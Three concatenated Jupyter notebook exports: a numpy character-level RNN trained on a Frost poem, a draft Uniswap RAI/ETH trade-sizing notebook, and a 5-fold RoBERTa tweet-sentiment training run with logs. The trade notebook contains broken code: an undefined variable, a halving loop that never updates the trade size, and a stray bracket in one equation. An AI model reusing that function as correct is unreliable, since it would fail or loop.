seq_length = len(caches) // 2
for i in reversed(range(seq_length)):
y = Y[i].reshape(vocab_size, 1)
x = X[i].reshape(vocab_size, 1)
dZ = np.copy(caches['A' + str(i+1)]) - y
dWhy += np.dot(dZ, caches['h' + str(i+1)].T)
dby += dZ
dht = np.dot(Why.T, dZ) + dhnext
dhraw = dht * (1 - caches['h' + str(i+1)] * caches['h' + str(i+1)])
dbh += dhraw
dWhh += np.dot(dhraw, caches['h' + str(i)].T)
dWxh += np.dot(dhraw, x.T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
grads = (dWxh, dWhh, dWhy, dbh, dby)
return grads
###Output
_____no_output_____
###Markdown
Parameters Update
###Code
def update_parameters(parameters, grads, adagrad_mem_vars, learning_rate):
'''
Update parameters of the network using Adagrad update
Arguments:
paramters -- tuple containing weights and biases of the network
grads -- tuple containing the gradients of the parameters
learning_rate -- rate of adagrad update
Returns
parameters -- tuple containing updated parameters
'''
a = np.copy(parameters[0])
for param, dparam, mem in zip(parameters, grads, adagrad_mem_vars):
mem += dparam * dparam
param -= learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
return (parameters, adagrad_mem_vars)
###Output
_____no_output_____
###Markdown
Sample text from model
###Code
def print_sample(ht, seed_ix, n, parameters):
"""
Samples a sequence of integers from the model.
Arguments
ht -- memory state
seed_ix --seed letter for first time step
n -- number of chars to extract
parameters -- tuple containing network weights and biases
"""
Wxh, Whh, Why, bh, by = parameters
x = np.eye(vocab_size)[seed_ix].reshape(vocab_size, 1)
ixes = []
for t in range(n):
ht = np.tanh(np.dot(Wxh, x) + np.dot(Whh, ht) + bh)
y = np.dot(Why, ht) + by
p = np.exp(y) / np.sum(np.exp(y))
ix = np.random.choice(range(vocab_size), p=p.ravel()) ### why not argmax of p??
x = np.eye(vocab_size)[ix].reshape(vocab_size, 1)
ixes.append(ix)
txt = ''.join(ix_to_char[ix] for ix in ixes)
print('----\n %s \n----' % txt)
def get_one_hot(p, char_to_ix, data, vocab_size):
'''
Gets indexes of chars of `seq_length` from `data`, returns them in one hot representation
'''
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
X = np.eye(vocab_size)[inputs]
Y = np.eye(vocab_size)[targets]
return X, Y
###Output
_____no_output_____
###Markdown
Model
###Code
def Model(data, seq_length, lr, char_to_ix, ix_to_char, num_of_iterations):
'''
Train RNN model and return trained parameters
'''
parameters, adagrad_mem_vars = initialize_parameters(hidden_size, vocab_size)
costs = []
n, p = 0, 0
smooth_loss = -np.log(1.0 / vocab_size) * seq_length
while n < num_of_iterations:
if p + seq_length + 1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size, 1)) # reset RNN memory
p = 0 # go from start of data
X, Y = get_one_hot(p, char_to_ix, data, vocab_size)
caches = forward_propogation(X, parameters, seq_length, hprev)
cost = compute_cost(Y, caches)
grads = backward_propogation(X, Y, caches, parameters)
parameters, adagrad_mem_vars = update_parameters(parameters, grads, adagrad_mem_vars, lr)
smooth_loss = smooth_loss * 0.999 + cost * 0.001
if n % 1000 == 0:
print_sample(hprev, char_to_ix['a'], 200, parameters)
print('Iteration: %d -- Cost: %0.3f' % (n, smooth_loss))
costs.append(cost)
hprev = caches['h' + str(seq_length)]
n+=1
p+=seq_length
plt.plot(costs)
return parameters
###Output
_____no_output_____
###Markdown
Implementing the model on a text
###Code
data = open('data/text-data.txt', 'r').read() # read a text file
chars = list(set(data)) # vocabulary
data_size, vocab_size = len(data), len(chars)
print ('data has %d characters, %d unique.' % (data_size, vocab_size))
char_to_ix = { ch:i for i,ch in enumerate(chars) } # maps char to it's index in vocabulary
ix_to_char = { i:ch for i,ch in enumerate(chars) } # maps index in vocabular to corresponding character
# hyper-parameters
learning_rate = 0.1
hidden_size = 100
seq_length = 25
num_of_iterations = 20000
parameters = Model(data, seq_length, learning_rate, char_to_ix, ix_to_char, num_of_iterations)
###Output
----
Schu
kwoj!wi nRA—— wj w .ycHrrhqagT:noh:ahvyqkSAnwpNtNTfpnk;hnnN
YIuprpNto:ThHYmcwdwYRYldcTaNmR
fkm!swem!
jnBqb iTIp,g,,v
qvw fkwS;g;!qmcBbicAlY;nbbIkwHYO:IsfhT :wl
—e!eI
.wwuoI—esSq—BOOcS
,mOyBIT;;u
----
Iteration: 0 -- Cost: 93.442
----
s wheng thert s dot bn,
B. wor TtoTar;
Had .asshThanb,
And as tha Telethabgas wberg penmerg te th;A,
Iy Sar me:
Thoudd herg d aberas and Then
Tnt ps waaverornasiactham!,
And bastevemer,r wing thitmth
----
Iteration: 1000 -- Cost: 68.503
----
veler anotrgr, ben,
I d agep had I clent there thallther iak lecI stok.
kere anis I shotheredint thavelest aseme way lealling per ais ay I dad
Ind baas tha siverged ia,
mar tredeelay,
And shadow tod
----
Iteration: 2000 -- Cost: 39.597
----
ksithet I bethathen betherusd we panted in a ore that fornind lowked bowd if bether keother waAna s wond themod the bess be he in trould woore as fir aiTh
And that Tas gre thathen boastougheramou the
----
Iteration: 3000 -- Cost: 22.733
----
gevelgarsing thes
Theniem
Thotroa to way,
Iedt bthe ind to ssy,
I shadowe kno dnas marsi
Tsher win oon toould now trn took the passing there
Had worn them really about the sas morn loodstoowing the te
----
Iteration: 4000 -- Cost: 11.318
----
d woads ind hewinr eng
I d way leavelena t—ng in the one in thewother, as just as for that the passingrt wen toows ay,
Iedt ow morn wt pe the better claim,
Back.
Oha d took the one less traved both
An
----
Iteration: 5000 -- Cost: 6.830
----
delling the traveled by len woore it lent that the passing there
Had worn them rhavesuho ben wit len wood,
And sorry I could notstr asshaithen the on the baps the bether corh bent in themu juh way lea
----
Iteration: 6000 -- Cost: 3.523
----
rre besep took beavellea by,
I sherdent the pit Inclaps sre pas graveler, the be owassed lot I soo
Thoughthom enghpa wavilge aive
Hac pin banr,
And he Tan
Tad gas owe in then ae
I s gratshacops theh a
----
Iteration: 7000 -- Cost: 4.619
----
nd ages hence:
Tso rowllong s morhaps the better claim,
Becaus in theh the one thalllouvish the in the aook the on the undergrowth;
shewans wans weer in ates hads wiverged in a yellow wood,
And tha
----
Iteration: 8000 -- Cost: 4.595
----
ss len len as trot troddyow yreasI wantes rnat hassy,
And en t ans ay In leakessharhads ohr cn bear;
And eors in bend t—e herher stous that mornith as for thaviverged in a yellow wood,
And sorry I do
----
Iteration: 9000 -- Cost: 2.303
----
g toode orl that morning equallyhea—ss way leads oir could notr;
And that has marsing this with a sigh
Somewhere ages and ages hence:
Two roads diverged in a yellow wood,
And sorry I coubd
Tore agss i
----
Iteration: 10000 -- Cost: 1.423
----
st as fair,
And having perhaps the better claim,
Because it was grassy and wanted wear;
Thoubd by,
And looked down one as far as I could
To where it bent in the undergrowth;
Then took the other, as j
----
Iteration: 11000 -- Cost: 0.915
----
share I—
I took the one less traveled by,
And that has mareishen
I challlas lasen ino ste traveler, look the one lllenithen has mirsin ans lookes dn way
In leaves n thet the pnd worn akep had tre th
----
Iteration: 12000 -- Cost: 0.672
----
get as I cops the passing thing in she beate
Talen that morrent ing hanted wear;
Though as for that the passing there
Had worn them really about the same,
And both that morning equally lay
In leaves
----
Iteration: 13000 -- Cost: 0.545
----
s firr ads that yh wanted waarn tookethea ben wood,
And having pe traveled by,
And that has marsing thirhaps the better claim,
Because it was grassy and worked dged wanteigrlenges I corhabem
The on to
----
Iteration: 14000 -- Cost: 0.471
----
nt be teelsherhept the passing that good the one less traveled by,
And that has maisith
And that has hais len bead wink on tood,eaubour air,
And wayd
Iges hadcld told,eduslero boad way lec way!
Yet Tw
----
Iteration: 15000 -- Cost: 0.426
----
s mareass woore in way
And both that morning equally lro the und th tond woollin with a sigh
Somewhere ages and ages hence:
Twough as fan traveled by,
And that has mar ing this with a sigh
Somewhere
----
Iteration: 16000 -- Cost: 6.138
----
ing and ages hence:
Two roads diverged in a yellow wood,
And sorn th wbeagel and way,
I doubted if I should ever aly Ih th w ynl and both that marling there
Had worn them really about the same,
And b
----
Iteration: 17000 -- Cost: 2.683
----
s mas merhith t morning equr way I could
Tore and aing ing thass ond both thet the better claim,
Because ing thaveler bing pass anin b abe the und worn woorsing horn lookst heages
Tokept the first for
----
Iteration: 18000 -- Cost: 1.299
----
d looked bout the pes it pe that morning equally lay
In leaves no step had trodden black.
Oh, I kept traver dtep had traveled by,
And that has marsithit the one traveler, long I stood
And looked down
----
Iteration: 19000 -- Cost: 1.071
|
notebooks/Trade Creation Example.ipynb | ###Markdown
$$ A \cdot B = C$$$$ (A+\Delta A) \cdot (B + \Delta B) = C$$$$ A \Delta B + B \Delta A + \Delta B \Delta A = 0$$ $$ \frac{A}{B} = R_{1}$$$$ \frac{A+\Delta A}{B + \Delta B} = R_{2}$$$$ A = B R_{1}$$$$ A+\Delta A = R_{2} [B + \Delta B]$$$$ B R_{1}+\Delta A = R_{2} [B + \Delta B]$$$$ \Delta A = B R_{2} + \Delta B R_{2} - B R_{1}$$ $$ A \Delta B + [B + \Delta B] \cdot [B R_{2} + \Delta B R_{2} - B R_{1}] - B R_{1}] = 0$$
###Code
rai_res / eth_res
true = 600
def agent_action(signal, s):
#Find current ratio
current_ratio = s['RAI_balance'] / s['ETH_balance']
eth_res = s['ETH_balance']
rai_res = s['RAI_balance']
#Find the side of the trade
if signal < current_ratio:
action_key = "eth_sold"
else:
action_key = "tokens_sold"
#Constant for equations
C = rai_res * eth_res
#Find the maximum shift that the trade should be able to sap up all arbitrage opportunities
max_shift = abs(rai_res / eth_res - true)
#Start with a constant choice of 10 eth trade
eth_size = 10
#Decide on sign of eth
if action == "eth_sold":
eth_delta = eth_size
else:
eth_delta = -eth_size
#Compute the RAI delta to hold C constant
rai_delta = C / (eth_res + eth_delta) - rai_res
#Caclulate the implied shift in ratio
implied_shift = abs((rai_res + rai_delta)/ (eth_res + eth_delta) - rai_res / eth_res)
#While the trade is too large, cut trade size in half
while implied_shift > max_shift:
#Cut trade in half
eth_size = eth_size/2
rai_delta = C / (eth_res + eth_delta) - rai_res
implied_shift = abs((rai_res + rai_delta)/ (eth_res + eth_delta) - rai_res / eth_res)
if action_key == "eth_sold":
I_t = s['ETH_balance']
O_t = s['RAI_balance']
I_t1 = s['ETH_balance']
O_t1 = s['RAI_balance']
delta_I = eth_delta
delta_O = rai_delta
else:
I_t = s['RAI_balance']
O_t = s['ETH_balance']
I_t1 = s['RAI_balance']
O_t1 = s['ETH_balance']
delta_I = rai_delta
delta_O = eth_delta
return I_t, O_t, I_t1, O_t1, delta_I, delta_O, action_key
s = {"RAI_balance": 4960695.994,
"ETH_balance": 7740.958682}
signal = 651.4802496080162
agent_action(signal, s)
eth_size
delta_I = uniswap_events['eth_delta'][t]
delta_O = uniswap_events['token_delta'][t]
action_key = 'eth_sold'
implied_shift
max_shift
(rai_res + rai_delta)/ (eth_res + eth_delta)
I_t, O_t, I_t1, O_t1, delta_I, delta_O, action_key
###Output
_____no_output_____ |
Model backlog/Train/236-Tweet-Train-5Fold-roBERTa reference HF no bias.ipynb | ###Markdown
Dependencies
###Code
import json, warnings, shutil
from scripts_step_lr_schedulers import *
from tweet_utility_scripts import *
from tweet_utility_preprocess_roberta_scripts_aux import *
from transformers import TFRobertaModel, RobertaConfig
from tokenizers import ByteLevelBPETokenizer
from tensorflow.keras.models import Model
from tensorflow.keras import optimizers, metrics, losses, layers
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
SEED = 0
seed_everything(SEED)
warnings.filterwarnings("ignore")
pd.set_option('max_colwidth', 120)
###Output
/usr/local/lib/python3.6/dist-packages/statsmodels/tools/_testing.py:19: FutureWarning: pandas.util.testing is deprecated. Use the functions in the public API at pandas.testing instead.
import pandas.util.testing as tm
###Markdown
Load data
###Code
# Unzip files
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_1.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_2.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_3.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_4.tar.gz'
!tar -xf '/content/drive/My Drive/Colab Notebooks/Tweet Sentiment Extraction/Data/complete_64_clean/fold_5.tar.gz'
database_base_path = COLAB_BASE_PATH + 'Data/complete_64_clean/'
k_fold = pd.read_csv(database_base_path + '5-fold.csv')
print(f'Training samples: {len(k_fold)}')
display(k_fold.head())
###Output
Training samples: 26882
###Markdown
Model parameters
###Code
vocab_path = COLAB_BASE_PATH + 'qa-transformers/roberta/roberta-base-vocab.json'
merges_path = COLAB_BASE_PATH + 'qa-transformers/roberta/roberta-base-merges.txt'
base_path = COLAB_BASE_PATH + 'qa-transformers/roberta/'
config = {
"MAX_LEN": 64,
"BATCH_SIZE": 32,
"EPOCHS": 7,
"LEARNING_RATE": 3e-5,
"ES_PATIENCE": 2,
"N_FOLDS": 5,
"question_size": 4,
"base_model_path": base_path + 'roberta-base-tf_model.h5',
"config_path": base_path + 'roberta-base-config.json'
}
with open(MODEL_BASE_PATH + 'config.json', 'w') as json_file:
json.dump(json.loads(json.dumps(config)), json_file)
###Output
_____no_output_____
###Markdown
Tokenizer
###Code
tokenizer = ByteLevelBPETokenizer(vocab_file=vocab_path, merges_file=merges_path,
lowercase=True, add_prefix_space=True)
###Output
_____no_output_____
###Markdown
Learning rate schedule
###Code
lr_min = 1e-6
lr_start = 0
lr_max = config['LEARNING_RATE']
train_size = len(k_fold[k_fold['fold_1'] == 'train'])
step_size = train_size // config['BATCH_SIZE']
total_steps = config['EPOCHS'] * step_size
warmup_steps = total_steps * 0.1
decay = .9985
rng = [i for i in range(0, total_steps, config['BATCH_SIZE'])]
y = [exponential_schedule_with_warmup(tf.cast(x, tf.float32), warmup_steps=warmup_steps, lr_start=lr_start,
lr_max=lr_max, lr_min=lr_min, decay=decay) for x in rng]
sns.set(style="whitegrid")
fig, ax = plt.subplots(figsize=(20, 6))
plt.plot(rng, y)
print("Learning rate schedule: {:.3g} to {:.3g} to {:.3g}".format(y[0], max(y), y[-1]))
###Output
Learning rate schedule: 0 to 2.96e-05 to 1e-06
###Markdown
Model
###Code
module_config = RobertaConfig.from_pretrained(config['config_path'], output_hidden_states=False)
def model_fn(MAX_LEN):
input_ids = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='input_ids')
attention_mask = layers.Input(shape=(MAX_LEN,), dtype=tf.int32, name='attention_mask')
base_model = TFRobertaModel.from_pretrained(config['base_model_path'], config=module_config, name="base_model")
last_hidden_state, _ = base_model({'input_ids': input_ids, 'attention_mask': attention_mask})
logits = layers.Dense(2, name="qa_outputs", use_bias=False)(last_hidden_state)
start_logits, end_logits = tf.split(logits, 2, axis=-1)
start_logits = tf.squeeze(start_logits, axis=-1)
end_logits = tf.squeeze(end_logits, axis=-1)
model = Model(inputs=[input_ids, attention_mask], outputs=[start_logits, end_logits])
return model
###Output
_____no_output_____
###Markdown
Train
###Code
def get_training_dataset(x_train, y_train, batch_size, buffer_size, seed=0):
dataset = tf.data.Dataset.from_tensor_slices(({'input_ids': x_train[0], 'attention_mask': x_train[1]},
(y_train[0], y_train[1])))
dataset = dataset.repeat()
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size, drop_remainder=True)
dataset = dataset.prefetch(buffer_size)
return dataset
def get_validation_dataset(x_valid, y_valid, batch_size, buffer_size, repeated=False, seed=0):
dataset = tf.data.Dataset.from_tensor_slices(({'input_ids': x_valid[0], 'attention_mask': x_valid[1]},
(y_valid[0], y_valid[1])))
if repeated:
dataset = dataset.repeat()
dataset = dataset.shuffle(2048, seed=seed)
dataset = dataset.batch(batch_size, drop_remainder=True)
dataset = dataset.cache()
dataset = dataset.prefetch(buffer_size)
return dataset
AUTO = tf.data.experimental.AUTOTUNE
history_list = []
for n_fold in range(config['N_FOLDS']):
n_fold +=1
print('\nFOLD: %d' % (n_fold))
# Load data
base_data_path = 'fold_%d/' % (n_fold)
x_train = np.load(base_data_path + 'x_train.npy')
y_train = np.load(base_data_path + 'y_train.npy')
x_valid = np.load(base_data_path + 'x_valid.npy')
y_valid = np.load(base_data_path + 'y_valid.npy')
step_size = x_train.shape[1] // config['BATCH_SIZE']
# Train model
model_path = 'model_fold_%d.h5' % (n_fold)
model = model_fn(config['MAX_LEN'])
es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'],
restore_best_weights=True, verbose=1)
checkpoint = ModelCheckpoint((MODEL_BASE_PATH + model_path), monitor='val_loss', mode='min',
save_best_only=True, save_weights_only=True)
optimizer = optimizers.Adam(learning_rate=lambda: exponential_schedule_with_warmup(tf.cast(optimizer.iterations, tf.float32),
warmup_steps=warmup_steps, lr_start=lr_start,
lr_max=lr_max, lr_min=lr_min, decay=decay))
model.compile(optimizer, loss=[losses.CategoricalCrossentropy(label_smoothing=0.2, from_logits=True),
losses.CategoricalCrossentropy(label_smoothing=0.2, from_logits=True)])
history = model.fit(get_training_dataset(x_train, y_train, config['BATCH_SIZE'], AUTO, seed=SEED),
validation_data=(get_validation_dataset(x_valid, y_valid, config['BATCH_SIZE'], AUTO, repeated=False, seed=SEED)),
epochs=config['EPOCHS'],
steps_per_epoch=step_size,
callbacks=[checkpoint, es],
verbose=2).history
history_list.append(history)
# Make predictions
# model.load_weights(MODEL_BASE_PATH + model_path)
predict_eval_df(k_fold, model, x_train, x_valid, get_test_dataset, decode, n_fold, tokenizer, config, config['question_size'])
###Output
FOLD: 1
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6262 - tf_op_layer_Squeeze_loss: 2.2742 - tf_op_layer_Squeeze_1_loss: 2.3520 - val_loss: 3.8167 - val_tf_op_layer_Squeeze_loss: 1.9365 - val_tf_op_layer_Squeeze_1_loss: 1.8801
Epoch 2/7
672/672 - 174s - loss: 3.7654 - tf_op_layer_Squeeze_loss: 1.9037 - tf_op_layer_Squeeze_1_loss: 1.8617 - val_loss: 3.7637 - val_tf_op_layer_Squeeze_loss: 1.9123 - val_tf_op_layer_Squeeze_1_loss: 1.8514
Epoch 3/7
672/672 - 170s - loss: 3.6594 - tf_op_layer_Squeeze_loss: 1.8531 - tf_op_layer_Squeeze_1_loss: 1.8064 - val_loss: 3.7658 - val_tf_op_layer_Squeeze_loss: 1.9114 - val_tf_op_layer_Squeeze_1_loss: 1.8544
Epoch 4/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.6206 - tf_op_layer_Squeeze_loss: 1.8334 - tf_op_layer_Squeeze_1_loss: 1.7872 - val_loss: 3.7652 - val_tf_op_layer_Squeeze_loss: 1.9133 - val_tf_op_layer_Squeeze_1_loss: 1.8519
Epoch 00004: early stopping
FOLD: 2
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6083 - tf_op_layer_Squeeze_2_loss: 2.2684 - tf_op_layer_Squeeze_3_loss: 2.3399 - val_loss: 3.8046 - val_tf_op_layer_Squeeze_2_loss: 1.9244 - val_tf_op_layer_Squeeze_3_loss: 1.8803
Epoch 2/7
672/672 - 174s - loss: 3.7481 - tf_op_layer_Squeeze_2_loss: 1.8970 - tf_op_layer_Squeeze_3_loss: 1.8511 - val_loss: 3.7555 - val_tf_op_layer_Squeeze_2_loss: 1.9004 - val_tf_op_layer_Squeeze_3_loss: 1.8551
Epoch 3/7
672/672 - 170s - loss: 3.6470 - tf_op_layer_Squeeze_2_loss: 1.8472 - tf_op_layer_Squeeze_3_loss: 1.7999 - val_loss: 3.7652 - val_tf_op_layer_Squeeze_2_loss: 1.9043 - val_tf_op_layer_Squeeze_3_loss: 1.8609
Epoch 4/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.5984 - tf_op_layer_Squeeze_2_loss: 1.8224 - tf_op_layer_Squeeze_3_loss: 1.7760 - val_loss: 3.7736 - val_tf_op_layer_Squeeze_2_loss: 1.9088 - val_tf_op_layer_Squeeze_3_loss: 1.8648
Epoch 00004: early stopping
FOLD: 3
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6556 - tf_op_layer_Squeeze_4_loss: 2.2783 - tf_op_layer_Squeeze_5_loss: 2.3773 - val_loss: 3.8716 - val_tf_op_layer_Squeeze_4_loss: 1.9330 - val_tf_op_layer_Squeeze_5_loss: 1.9386
Epoch 2/7
672/672 - 173s - loss: 3.8072 - tf_op_layer_Squeeze_4_loss: 1.9111 - tf_op_layer_Squeeze_5_loss: 1.8961 - val_loss: 3.7857 - val_tf_op_layer_Squeeze_4_loss: 1.9030 - val_tf_op_layer_Squeeze_5_loss: 1.8827
Epoch 3/7
672/672 - 175s - loss: 3.7039 - tf_op_layer_Squeeze_4_loss: 1.8655 - tf_op_layer_Squeeze_5_loss: 1.8383 - val_loss: 3.7600 - val_tf_op_layer_Squeeze_4_loss: 1.8993 - val_tf_op_layer_Squeeze_5_loss: 1.8607
Epoch 4/7
672/672 - 174s - loss: 3.6497 - tf_op_layer_Squeeze_4_loss: 1.8417 - tf_op_layer_Squeeze_5_loss: 1.8080 - val_loss: 3.7594 - val_tf_op_layer_Squeeze_4_loss: 1.9010 - val_tf_op_layer_Squeeze_5_loss: 1.8584
Epoch 5/7
672/672 - 170s - loss: 3.6217 - tf_op_layer_Squeeze_4_loss: 1.8302 - tf_op_layer_Squeeze_5_loss: 1.7915 - val_loss: 3.7617 - val_tf_op_layer_Squeeze_4_loss: 1.9013 - val_tf_op_layer_Squeeze_5_loss: 1.8604
Epoch 6/7
672/672 - 174s - loss: 3.6217 - tf_op_layer_Squeeze_4_loss: 1.8294 - tf_op_layer_Squeeze_5_loss: 1.7923 - val_loss: 3.7593 - val_tf_op_layer_Squeeze_4_loss: 1.9009 - val_tf_op_layer_Squeeze_5_loss: 1.8584
Epoch 7/7
672/672 - 170s - loss: 3.6107 - tf_op_layer_Squeeze_4_loss: 1.8222 - tf_op_layer_Squeeze_5_loss: 1.7885 - val_loss: 3.7632 - val_tf_op_layer_Squeeze_4_loss: 1.9040 - val_tf_op_layer_Squeeze_5_loss: 1.8592
FOLD: 4
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6672 - tf_op_layer_Squeeze_6_loss: 2.3056 - tf_op_layer_Squeeze_7_loss: 2.3616 - val_loss: 3.8042 - val_tf_op_layer_Squeeze_6_loss: 1.9207 - val_tf_op_layer_Squeeze_7_loss: 1.8834
Epoch 2/7
672/672 - 174s - loss: 3.7749 - tf_op_layer_Squeeze_6_loss: 1.9107 - tf_op_layer_Squeeze_7_loss: 1.8642 - val_loss: 3.7413 - val_tf_op_layer_Squeeze_6_loss: 1.8894 - val_tf_op_layer_Squeeze_7_loss: 1.8518
Epoch 3/7
672/672 - 170s - loss: 3.6672 - tf_op_layer_Squeeze_6_loss: 1.8545 - tf_op_layer_Squeeze_7_loss: 1.8127 - val_loss: 3.7421 - val_tf_op_layer_Squeeze_6_loss: 1.8898 - val_tf_op_layer_Squeeze_7_loss: 1.8522
Epoch 4/7
672/672 - 174s - loss: 3.6221 - tf_op_layer_Squeeze_6_loss: 1.8365 - tf_op_layer_Squeeze_7_loss: 1.7856 - val_loss: 3.7413 - val_tf_op_layer_Squeeze_6_loss: 1.8894 - val_tf_op_layer_Squeeze_7_loss: 1.8519
Epoch 5/7
672/672 - 170s - loss: 3.6030 - tf_op_layer_Squeeze_6_loss: 1.8240 - tf_op_layer_Squeeze_7_loss: 1.7790 - val_loss: 3.7476 - val_tf_op_layer_Squeeze_6_loss: 1.8927 - val_tf_op_layer_Squeeze_7_loss: 1.8549
Epoch 6/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.5930 - tf_op_layer_Squeeze_6_loss: 1.8208 - tf_op_layer_Squeeze_7_loss: 1.7722 - val_loss: 3.7442 - val_tf_op_layer_Squeeze_6_loss: 1.8918 - val_tf_op_layer_Squeeze_7_loss: 1.8524
Epoch 00006: early stopping
FOLD: 5
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6296 - tf_op_layer_Squeeze_8_loss: 2.2781 - tf_op_layer_Squeeze_9_loss: 2.3515 - val_loss: 3.8736 - val_tf_op_layer_Squeeze_8_loss: 1.9447 - val_tf_op_layer_Squeeze_9_loss: 1.9289
Epoch 2/7
672/672 - 174s - loss: 3.8388 - tf_op_layer_Squeeze_8_loss: 1.9216 - tf_op_layer_Squeeze_9_loss: 1.9172 - val_loss: 3.7991 - val_tf_op_layer_Squeeze_8_loss: 1.8955 - val_tf_op_layer_Squeeze_9_loss: 1.9036
Epoch 3/7
672/672 - 174s - loss: 3.7222 - tf_op_layer_Squeeze_8_loss: 1.8760 - tf_op_layer_Squeeze_9_loss: 1.8462 - val_loss: 3.7759 - val_tf_op_layer_Squeeze_8_loss: 1.8970 - val_tf_op_layer_Squeeze_9_loss: 1.8788
Epoch 4/7
672/672 - 174s - loss: 3.6699 - tf_op_layer_Squeeze_8_loss: 1.8534 - tf_op_layer_Squeeze_9_loss: 1.8165 - val_loss: 3.7650 - val_tf_op_layer_Squeeze_8_loss: 1.8943 - val_tf_op_layer_Squeeze_9_loss: 1.8707
Epoch 5/7
672/672 - 174s - loss: 3.6539 - tf_op_layer_Squeeze_8_loss: 1.8482 - tf_op_layer_Squeeze_9_loss: 1.8056 - val_loss: 3.7601 - val_tf_op_layer_Squeeze_8_loss: 1.8913 - val_tf_op_layer_Squeeze_9_loss: 1.8688
Epoch 6/7
672/672 - 174s - loss: 3.6391 - tf_op_layer_Squeeze_8_loss: 1.8402 - tf_op_layer_Squeeze_9_loss: 1.7990 - val_loss: 3.7598 - val_tf_op_layer_Squeeze_8_loss: 1.8908 - val_tf_op_layer_Squeeze_9_loss: 1.8689
Epoch 7/7
672/672 - 170s - loss: 3.6387 - tf_op_layer_Squeeze_8_loss: 1.8385 - tf_op_layer_Squeeze_9_loss: 1.8002 - val_loss: 3.7620 - val_tf_op_layer_Squeeze_8_loss: 1.8924 - val_tf_op_layer_Squeeze_9_loss: 1.8696
###Markdown
Model loss graph
###Code
#@title
for n_fold in range(config['N_FOLDS']):
print('Fold: %d' % (n_fold+1))
plot_metrics(history_list[n_fold])
###Output
Fold: 1
###Markdown
Model evaluation
###Code
#@title
display(evaluate_model_kfold(k_fold, config['N_FOLDS']).style.applymap(color_map))
###Output
_____no_output_____
###Markdown
Visualize predictions
###Code
#@title
k_fold['jaccard_mean'] = 0
for n in range(config['N_FOLDS']):
k_fold['jaccard_mean'] += k_fold[f'jaccard_fold_{n+1}'] / config['N_FOLDS']
